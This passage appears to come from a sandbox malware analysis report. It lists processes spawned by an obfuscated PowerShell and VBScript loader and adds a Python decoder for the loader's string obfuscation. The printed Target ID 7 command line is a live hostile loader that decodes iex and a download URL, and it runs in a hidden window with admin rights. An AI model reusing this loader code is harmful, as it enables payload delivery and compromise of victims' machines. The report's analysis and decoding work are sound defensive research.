                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\ik473a.vbs'"
                                                                            Imagebase:0x7ff760310000
                                                                            File size:452'608 bytes
                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:6
                                                                            Start time:04:39:29
                                                                            Start date:05/12/2024
                                                                            Path:C:\Windows\System32\wscript.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\Public\tq5.vbs"
                                                                            Imagebase:0x7ff75f2d0000
                                                                            File size:170'496 bytes
                                                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true
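The command line recorded for Target ID 7 (next entry below) decodes nearly every string literal at run time through a function it names gaardspladsens. The script first runs $Bellisserne++ on an unset variable, making it 1, then loops for($Unminimizing=5; $Unminimizing -lt $Agerendes.Length-$Bellisserne; $Unminimizing+=6) and keeps $Agerendes.Substring($Unminimizing, 1) each pass, so one character in six is real and the other five are filler; sanktionjtr then dot-sources the decoded text through the decoded $Emanciperingerne, which is iex. The Python below is an added re-implementation for analysis, not code from the report or the sample. The literals it decodes are copied from that command line and yield iex, > and User-Agent. One caveat a practitioner needs: the report's HTML rendering collapses runs of spaces inside the literals, and where the filler contained two adjacent spaces the six-byte stride no longer lines up (the Mozilla/5.0 user-agent string and the URL list are affected), so decode those from the raw sample rather than from this page.

```python
"""Decoder for the string obfuscation in the Target ID 7 command line.
Re-implementation for analysis; not the sample's code."""


def gaardspladsens(blob: str, first: int = 5, step: int = 6) -> str:
    # PowerShell original: for ($i = 5; $i -lt $blob.Length - 1; $i += 6) { $out += $blob.Substring($i, 1) }
    # The upper bound is Length - 1 because $Bellisserne has been incremented once, to 1.
    return "".join(blob[i] for i in range(first, len(blob) - 1, step))


# Encoded literals copied from the command line, keyed by the PowerShell variable
# each is assigned to. Only literals whose filler has no run of two or more spaces
# are used, because the report's HTML rendering collapses such runs.
ENCODED = {
    "Emanciperingerne": "Bru.hiBlideeRut,exFyl e ",
    "Deaktiverende": "panor> atol ",
    "Fangstknivens": "ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ",
}


def decode_all(encoded=ENCODED):
    """Decode every literal; returns {variable name: clear text}."""
    return {name: gaardspladsens(blob) for name, blob in encoded.items()}


def looks_intact(blob: str, step: int = 6) -> bool:
    """Sanity check before trusting a decode taken from rendered HTML: no collapsed
    double space, and a length that is a whole number of steps (every literal
    checked on this page is padded that way; assumed to hold for the rest)."""
    return "  " not in blob and len(blob) % step == 0


if __name__ == "__main__":
    for name, clear in decode_all().items():
        print(f"${name} -> {clear!r}")
```

Running decode_all() against the raw script rather than this page gives the full set of clear-text strings; looks_intact() marks the ones worth trusting when only the rendered report is available.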

                                                                            Target ID:7
                                                                            Start time:04:39:29
                                                                            Start date:05/12/2024
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. 
Imagebase: 0x7ff760310000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 8
Start time: 04:39:29
Start date: 05/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff70f010000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 9
Start time: 04:39:30
Start date: 05/12/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Succesfulde.blo && echo t"
Imagebase: 0x7ff76f730000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true
                                                                              • Instruction ID: c07fcae05ddfe7c3aa67e587eec15b763002ad44d13a9c2f3870ca5e526d7912
                                                                              • Opcode Fuzzy Hash: 5796f8ec847ec2a56fb6f25fada19626f72ff4becbe0193802d0689c0e0362ca
                                                                              • Instruction Fuzzy Hash: 0E316423D8E9C14FE35649B4281923A6EB2FF52B90B6840FFC09C872DBE454995DD381
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2759429791.00007FF887BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BE0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_7ff887be0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @Je$]$p@y$x.e
                                                                              • API String ID: 0-4158309294
                                                                              • Opcode ID: 8643edc7a0a86e633ba1fc131e50cf054c2aa6c0e4caac395d48836919e85a69
                                                                              • Instruction ID: 8f74ab99050a95df0013d8fa3a76bf0bb321c1d699e75ecfcbdac5230ee4d2f0
                                                                              • Opcode Fuzzy Hash: 8643edc7a0a86e633ba1fc131e50cf054c2aa6c0e4caac395d48836919e85a69
                                                                              • Instruction Fuzzy Hash: 89219F73C8E9D14FE35686A938092796EB2BF52650B6840FBC04C8B2DBD849DD98D346